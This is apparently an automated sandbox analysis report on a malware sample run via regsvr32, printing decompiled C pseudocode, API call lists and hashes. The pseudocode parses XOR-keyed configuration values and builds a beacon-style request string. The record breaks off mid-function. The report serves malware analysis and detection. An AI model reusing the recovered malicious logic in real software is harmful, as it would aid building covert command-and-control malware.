                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD1037, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                Download Yara Rule
                                C-Code - Quality: 34%
                                			E02BD1037(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x2bdd2a8; // 0x242a5a8
				_t4 = _t15 + 0x2bde39c; // 0x5008944
				_t20 = _t4;
				_t6 = _t15 + 0x2bde124; // 0x650047
				_t17 = E02BD76E7(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E02BD7EA4(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                0x02bd1041
                                0x02bd1048
                                0x02bd1049
                                0x02bd104a
                                0x02bd104b
                                0x02bd1051
                                0x02bd1056
                                0x02bd1056
                                0x02bd1060
                                0x02bd1072
                                0x02bd1079
                                0x02bd10a7
                                0x02bd107b
                                0x02bd107d
                                0x02bd1082
                                0x02bd10a4
                                0x02bd1084
                                0x02bd1087
                                0x02bd108e
                                0x02bd1093
                                0x02bd1095
                                0x02bd1095
                                0x02bd109a
                                0x02bd109a
                                0x02bd1082
                                0x02bd10ae

                                APIs
                                  • Part of subcall function 02BD76E7: SysFreeString.OLEAUT32(?), ref: 02BD77C6
                                  • Part of subcall function 02BD7EA4: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,02BD51D4,004F0053,00000000,?), ref: 02BD7EAD
                                  • Part of subcall function 02BD7EA4: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,02BD51D4,004F0053,00000000,?), ref: 02BD7ED7
                                  • Part of subcall function 02BD7EA4: memset.NTDLL ref: 02BD7EEB
                                • SysFreeString.OLEAUT32(00000000), ref: 02BD109A
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: FreeString$lstrlenmemcpymemset
                                • String ID:
                                • API String ID: 397948122-0
                                • Opcode ID: b9fd2933bb8afe5522e88a34f8368386f09c35572aaea41a45f72d45be206ab2
                                • Instruction ID: f9ed947d2958727e58154438220d61433f9ab52622116d6de864dbab3d8a45bd
                                • Opcode Fuzzy Hash: b9fd2933bb8afe5522e88a34f8368386f09c35572aaea41a45f72d45be206ab2
                                • Instruction Fuzzy Hash: F2017C32910159BFDB12AFADCC00DEABBB9EB05354F4185A5E908E7060F771D921CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 02BD7FBE, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258memoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 96%
                                			E02BD7FBE(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t121;

				_t104 = __ecx;
				_t28 =  *0x2bdd2a4; // 0x69b25f44
				if(E02BD6247( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x90) {
					 *0x2bdd2d8 = _v8;
				}
				_t33 =  *0x2bdd2a4; // 0x69b25f44
				if(E02BD6247( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x2bdd2a4; // 0x69b25f44
				if(E02BD6247( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x2bdd238, 0, _v16);
					goto L69;
				} else {
					_t103 = _v12;
					if(_t103 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x2bdd2a4; // 0x69b25f44
						_t45 = E02BD9403(_t104, _t103, _t98 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x2bdd240 = _v8;
						}
					}
					if(_t103 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x2bdd2a4; // 0x69b25f44
						_t46 = E02BD9403(_t104, _t103, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x2bdd244 = _v8;
						}
					}
					if(_t103 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x2bdd2a4; // 0x69b25f44
						_t47 = E02BD9403(_t104, _t103, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x2bdd248 = _v8;
						}
					}
					if(_t103 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x2bdd2a4; // 0x69b25f44
						_t48 = E02BD9403(_t104, _t103, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x2bdd004 = _v8;
						}
					}
					if(_t103 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x2bdd2a4; // 0x69b25f44
						_t49 = E02BD9403(_t104, _t103, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x2bdd02c = _v8;
						}
					}
					if(_t103 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x2bdd2a4; // 0x69b25f44
						_t50 = E02BD9403(_t104, _t103, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x2bdd24c = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t103 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x2bdd2a4; // 0x69b25f44
								_t51 = E02BD9403(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E02BDA0FD(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E02BD9FF6();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x2bdd2a4; // 0x69b25f44
								_t52 = E02BD9403(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E02BDA0FD(0, _t52) != 0) {
								_t121 =  *0x2bdd32c; // 0x50095b0
								E02BD1128(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x2bdd2a4; // 0x69b25f44
								_t53 = E02BD9403(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x2bdd2a8; // 0x242a5a8
								_t22 = _t54 + 0x2bde252; // 0x616d692f
								 *0x2bdd2d4 = _t22;
								goto L60;
							} else {
								_t64 = E02BDA0FD(0, _t53);
								 *0x2bdd2d4 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x2bdd2a4; // 0x69b25f44
										_t56 = E02BD9403(_t104, _t103, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x2bdd2a8; // 0x242a5a8
										_t23 = _t57 + 0x2bde791; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E02BDA0FD(0, _t56);
									}
									 *0x2bdd340 = _t58;
									HeapFree( *0x2bdd238, 0, _t103);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}






































                                0x02bd7fbe
                                0x02bd7fc1
                                0x02bd7fe1
                                0x02bd7fef
                                0x02bd7fef
                                0x02bd7ff4
                                0x02bd800e
                                0x02bd8276
                                0x02bd827d
                                0x02bd8284
                                0x02bd8284
                                0x02bd8014
                                0x02bd8030
                                0x02bd8264
                                0x02bd826e
                                0x00000000
                                0x02bd8036
                                0x02bd8036
                                0x02bd803b
                                0x02bd8051
                                0x02bd803d
                                0x02bd803d
                                0x02bd804a
                                0x02bd804a
                                0x02bd805b
                                0x02bd805d
                                0x02bd8067
                                0x02bd806c
                                0x02bd806c
                                0x02bd8067
                                0x02bd8073
                                0x02bd8089
                                0x02bd8075
                                0x02bd8075
                                0x02bd8082
                                0x02bd8082
                                0x02bd808d
                                0x02bd808f
                                0x02bd8099
                                0x02bd809e
                                0x02bd809e
                                0x02bd8099
                                0x02bd80a5
                                0x02bd80bb
                                0x02bd80a7
                                0x02bd80a7
                                0x02bd80b4
                                0x02bd80b4
                                0x02bd80bf
                                0x02bd80c1
                                0x02bd80cb
                                0x02bd80d0
                                0x02bd80d0
                                0x02bd80cb
                                0x02bd80d7
                                0x02bd80ed
                                0x02bd80d9
                                0x02bd80d9
                                0x02bd80e6
                                0x02bd80e6
                                0x02bd80f1
                                0x02bd80f3
                                0x02bd80fd
                                0x02bd8102
                                0x02bd8102
                                0x02bd80fd
                                0x02bd8109
                                0x02bd811f
                                0x02bd810b
                                0x02bd810b
                                0x02bd8118
                                0x02bd8118
                                0x02bd8123
                                0x02bd8125
                                0x02bd812f
                                0x02bd8134
                                0x02bd8134
                                0x02bd812f
                                0x02bd813b
                                0x02bd8151
                                0x02bd813d
                                0x02bd813d
                                0x02bd814a
                                0x02bd814a
                                0x02bd8155
                                0x02bd8168
                                0x02bd8168
                                0x00000000
                                0x02bd8157
                                0x02bd8157
                                0x02bd8161
                                0x00000000
                                0x02bd8172
                                0x02bd8172
                                0x02bd8174
                                0x02bd818a
                                0x02bd8176
                                0x02bd8176
                                0x02bd8183
                                0x02bd8183
                                0x02bd818e
                                0x02bd8190
                                0x02bd8193
                                0x02bd8194
                                0x02bd819b
                                0x02bd819d
                                0x02bd819e
                                0x02bd819e
                                0x02bd819b
                                0x02bd81a5
                                0x02bd81bb
                                0x02bd81a7
                                0x02bd81a7
                                0x02bd81b4
                                0x02bd81b4
                                0x02bd81bf
                                0x02bd81cd
                                0x02bd81d7
                                0x02bd81d7
                                0x02bd81de
                                0x02bd81f4
                                0x02bd81e0
                                0x02bd81e0
                                0x02bd81ed
                                0x02bd81ed
                                0x02bd81f8
                                0x02bd820b
                                0x02bd820b
                                0x02bd8210
                                0x02bd8216
                                0x00000000
                                0x02bd81fa
                                0x02bd81fd
                                0x02bd8202
                                0x02bd8209
                                0x02bd821b
                                0x02bd821d
                                0x02bd8233
                                0x02bd821f
                                0x02bd821f
                                0x02bd822c
                                0x02bd822c
                                0x02bd8237
                                0x02bd8243
                                0x02bd8248
                                0x02bd8248
                                0x02bd8239
                                0x02bd823c
                                0x02bd823c
                                0x02bd8256
                                0x02bd825b
                                0x02bd8261
                                0x00000000
                                0x02bd8261
                                0x00000000
                                0x02bd8209
                                0x02bd81f8
                                0x02bd8161
                                0x02bd8155

                                APIs
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BD30F3,?,69B25F44,?,02BD30F3,69B25F44,?,02BD30F3,69B25F44,00000005,02BDD00C,00000008), ref: 02BD8063
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BD30F3,?,69B25F44,?,02BD30F3,69B25F44,?,02BD30F3,69B25F44,00000005,02BDD00C,00000008), ref: 02BD8095
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BD30F3,?,69B25F44,?,02BD30F3,69B25F44,?,02BD30F3,69B25F44,00000005,02BDD00C,00000008), ref: 02BD80C7
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BD30F3,?,69B25F44,?,02BD30F3,69B25F44,?,02BD30F3,69B25F44,00000005,02BDD00C,00000008), ref: 02BD80F9
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BD30F3,?,69B25F44,?,02BD30F3,69B25F44,?,02BD30F3,69B25F44,00000005,02BDD00C,00000008), ref: 02BD812B
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,02BD30F3,?,69B25F44,?,02BD30F3,69B25F44,?,02BD30F3,69B25F44,00000005,02BDD00C,00000008), ref: 02BD815D
                                • HeapFree.KERNEL32(00000000,02BD30F3,02BD30F3,?,69B25F44,?,02BD30F3,69B25F44,?,02BD30F3,69B25F44,00000005,02BDD00C,00000008,?,02BD30F3), ref: 02BD825B
                                • HeapFree.KERNEL32(00000000,?,02BD30F3,?,69B25F44,?,02BD30F3,69B25F44,?,02BD30F3,69B25F44,00000005,02BDD00C,00000008,?,02BD30F3), ref: 02BD826E
                                  • Part of subcall function 02BDA0FD: lstrlen.KERNEL32(69B25F44,00000000,7673D3B0,02BD30F3,02BD8241,00000000,02BD30F3,?,69B25F44,?,02BD30F3,69B25F44,?,02BD30F3,69B25F44,00000005), ref: 02BDA106
                                  • Part of subcall function 02BDA0FD: memcpy.NTDLL(00000000,?,00000000,00000001,?,02BD30F3), ref: 02BDA129
                                  • Part of subcall function 02BDA0FD: memset.NTDLL ref: 02BDA138
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: FreeHeap$lstrlenmemcpymemset
                                • String ID: Ut
                                • API String ID: 3442150357-8415677
                                • Opcode ID: ef443b17eb561d085dbe8cf4dac3afaacb5b1adc21c9d40d031cbe8d6ee209ff
                                • Instruction ID: 867c9e8a1d8a5c6385b700b3f50074e88bbd129a853aa16f627eadc5748af779
                                • Opcode Fuzzy Hash: ef443b17eb561d085dbe8cf4dac3afaacb5b1adc21c9d40d031cbe8d6ee209ff
                                • Instruction Fuzzy Hash: A481B371E01606AFC720EBB8DD94EDB77ADEB4C6417680DA5A485D7100FB31E9868B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD5450, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 244memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 74%
                                			E02BD5450(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x2bdd018; // 0xefcf766a
				asm("bswap eax");
				_t61 =  *0x2bdd014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x2bdd010; // 0xd8d2f808
				asm("bswap eax");
				_t63 = E02BDD00C; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0x2bdd2a8; // 0x242a5a8
				_t3 = _t64 + 0x2bde633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3d163, _t63, _t62, _t61, _t60,  *0x2bdd02c,  *0x2bdd004, _t59);
				_t67 = E02BD3288();
				_t68 =  *0x2bdd2a8; // 0x242a5a8
				_t4 = _t68 + 0x2bde673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E02BD831C(_t134);
				_t133 = __imp__; // 0x74e05520
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x2bdd2a8; // 0x242a5a8
					_t7 = _t126 + 0x2bde8d4; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x2bdd238, 0, _v8);
				}
				_t73 = E02BD9267();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x2bdd2a8; // 0x242a5a8
					_t11 = _t121 + 0x2bde8dc; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x2bdd238, 0, _v8);
				}
				_t146 =  *0x2bdd32c; // 0x50095b0
				_t75 = E02BD284E(0x2bdd00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x2bdd238, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x2bdd238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x2bdd238, _t152, _v20);
						goto L26;
					}
					E02BD3239(GetTickCount());
					_t82 =  *0x2bdd32c; // 0x50095b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x2bdd32c; // 0x50095b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x2bdd32c; // 0x50095b0
					_t148 = E02BD7B8D(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x2bdd238, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x2bdc28c);
					_push(_t148);
					_t94 = E02BDA677();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x2bdd238, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E02BD7B3B( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E02BD5433();
						L22:
						HeapFree( *0x2bdd238, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E02BD9F33(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E02BD137B(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E02BD8B22(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E02BD7953(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E02BD8B22(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}





















































                                0x02bd5450
                                0x02bd5450
                                0x02bd5450
                                0x02bd5459
                                0x02bd5462
                                0x02bd5464
                                0x02bd5464
                                0x02bd5471
                                0x02bd547c
                                0x02bd547f
                                0x02bd5484
                                0x02bd548d
                                0x02bd5490
                                0x02bd5495
                                0x02bd5498
                                0x02bd549d
                                0x02bd54a0
                                0x02bd54ac
                                0x02bd54b9
                                0x02bd54bb
                                0x02bd54c1
                                0x02bd54c6
                                0x02bd54d1
                                0x02bd54d3
                                0x02bd54d6
                                0x02bd54d8
                                0x02bd54dd
                                0x02bd54e3
                                0x02bd54e8
                                0x02bd54eb
                                0x02bd54f0
                                0x02bd54fd
                                0x02bd54ff
                                0x02bd5505
                                0x02bd550f
                                0x02bd550f
                                0x02bd5511
                                0x02bd5516
                                0x02bd551b
                                0x02bd551e
                                0x02bd5523
                                0x02bd5530
                                0x02bd5532
                                0x02bd5540
                                0x02bd5540
                                0x02bd5542
                                0x02bd5550
                                0x02bd5555
                                0x02bd5557
                                0x02bd555c
                                0x02bd571d
                                0x02bd5727
                                0x02bd5730
                                0x02bd5562
                                0x02bd556e
                                0x02bd5574
                                0x02bd5579
                                0x02bd5711
                                0x02bd571b
                                0x00000000
                                0x02bd571b
                                0x02bd5585
                                0x02bd558a
                                0x02bd5593
                                0x02bd55a4
                                0x02bd55a8
                                0x02bd55b1
                                0x02bd55b7
                                0x02bd55c6
                                0x02bd55cd
                                0x02bd55d6
                                0x02bd55dc
                                0x02bd5705
                                0x02bd570f
                                0x00000000
                                0x02bd570f
                                0x02bd55e8
                                0x02bd55ee
                                0x02bd55ef
                                0x02bd55f4
                                0x02bd55f9
                                0x02bd56fb
                                0x02bd5703
                                0x00000000
                                0x02bd5703
                                0x02bd5602
                                0x02bd5609
                                0x02bd5611
                                0x02bd5616
                                0x02bd561f
                                0x02bd562a
                                0x02bd562f
                                0x02bd5634
                                0x02bd5733
                                0x02bd56e7
                                0x02bd56e7
                                0x02bd56ec
                                0x02bd56f7
                                0x02bd56f9
                                0x00000000
                                0x02bd56f9
                                0x02bd563e
                                0x02bd5643
                                0x02bd5648
                                0x02bd564d
                                0x02bd565d
                                0x02bd5660
                                0x02bd5666
                                0x02bd566c
                                0x02bd5672
                                0x02bd5675
                                0x02bd567b
                                0x02bd567e
                                0x02bd5683
                                0x02bd5687
                                0x02bd5687
                                0x02bd5693
                                0x02bd569f
                                0x02bd56a3
                                0x02bd56a5
                                0x02bd56aa
                                0x02bd56ac
                                0x02bd56b1
                                0x02bd56b6
                                0x02bd56c3
                                0x02bd56cb
                                0x02bd56ce
                                0x02bd56ce
                                0x02bd56aa
                                0x00000000
                                0x02bd5695
                                0x02bd5699
                                0x02bd56d0
                                0x02bd56d3
                                0x02bd56dc
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02bd56dc
                                0x02bd569b
                                0x00000000
                                0x02bd569b
                                0x02bd5693

                                APIs
                                • GetTickCount.KERNEL32 ref: 02BD5464
                                • wsprintfA.USER32 ref: 02BD54B4
                                • wsprintfA.USER32 ref: 02BD54D1
                                • wsprintfA.USER32 ref: 02BD54FD
                                • HeapFree.KERNEL32(00000000,?), ref: 02BD550F
                                • wsprintfA.USER32 ref: 02BD5530
                                • HeapFree.KERNEL32(00000000,?), ref: 02BD5540
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BD556E
                                • GetTickCount.KERNEL32 ref: 02BD557F
                                • RtlEnterCriticalSection.NTDLL(05009570), ref: 02BD5593
                                • RtlLeaveCriticalSection.NTDLL(05009570), ref: 02BD55B1
                                  • Part of subcall function 02BD7B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,02BD9DA0,?,050095B0), ref: 02BD7BB8
                                  • Part of subcall function 02BD7B8D: lstrlen.KERNEL32(?,?,?,02BD9DA0,?,050095B0), ref: 02BD7BC0
                                  • Part of subcall function 02BD7B8D: strcpy.NTDLL ref: 02BD7BD7
                                  • Part of subcall function 02BD7B8D: lstrcat.KERNEL32(00000000,?), ref: 02BD7BE2
                                  • Part of subcall function 02BD7B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02BD9DA0,?,050095B0), ref: 02BD7BFF
                                • StrTrimA.SHLWAPI(00000000,02BDC28C,?,050095B0), ref: 02BD55E8
                                  • Part of subcall function 02BDA677: lstrlen.KERNEL32(05009B08,00000000,00000000,7691C740,02BD9DCB,00000000), ref: 02BDA687
                                  • Part of subcall function 02BDA677: lstrlen.KERNEL32(?), ref: 02BDA68F
                                  • Part of subcall function 02BDA677: lstrcpy.KERNEL32(00000000,05009B08), ref: 02BDA6A3
                                  • Part of subcall function 02BDA677: lstrcat.KERNEL32(00000000,?), ref: 02BDA6AE
                                • lstrcpy.KERNEL32(00000000,?), ref: 02BD5609
                                • lstrcpy.KERNEL32(?,?), ref: 02BD5611
                                • lstrcat.KERNEL32(?,?), ref: 02BD561F
                                • lstrcat.KERNEL32(?,00000000), ref: 02BD5625
                                  • Part of subcall function 02BD7B3B: lstrlen.KERNEL32(?,00000000,05009D18,00000000,02BD5142,05009F3B,?,?,?,?,?,69B25F44,00000005,02BDD00C), ref: 02BD7B42
                                  • Part of subcall function 02BD7B3B: mbstowcs.NTDLL ref: 02BD7B6B
                                  • Part of subcall function 02BD7B3B: memset.NTDLL ref: 02BD7B7D
                                • wcstombs.NTDLL ref: 02BD56B6
                                  • Part of subcall function 02BD137B: SysAllocString.OLEAUT32(?), ref: 02BD13B6
                                  • Part of subcall function 02BD8B22: RtlFreeHeap.NTDLL(00000000,00000000,02BD131A,00000000,?,?,00000000), ref: 02BD8B2E
                                • HeapFree.KERNEL32(00000000,?,?), ref: 02BD56F7
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BD5703
                                • HeapFree.KERNEL32(00000000,?,?,050095B0), ref: 02BD570F
                                • HeapFree.KERNEL32(00000000,?), ref: 02BD571B
                                • HeapFree.KERNEL32(00000000,?), ref: 02BD5727
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                • String ID: Ut
                                • API String ID: 3748877296-8415677
                                • Opcode ID: a8dcbe71af2e9fe71fa0681f0a7a36a8146bcd36b3ed6a2bf1ec07647cf22d56
                                • Instruction ID: ac49fbb68161c1187ea88acebd4489ae435b12f9b2d3f53e8990956eb2389e65
                                • Opcode Fuzzy Hash: a8dcbe71af2e9fe71fa0681f0a7a36a8146bcd36b3ed6a2bf1ec07647cf22d56
                                • Instruction Fuzzy Hash: C9915972941109AFCB119FA8DC98AEEBBB9EF08390F544895F444D7260EB31D961DF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD3485, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109librarymemoryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 73%
                                			E02BD3485(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E02BD4944(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E02BDA789( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x2bdd260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
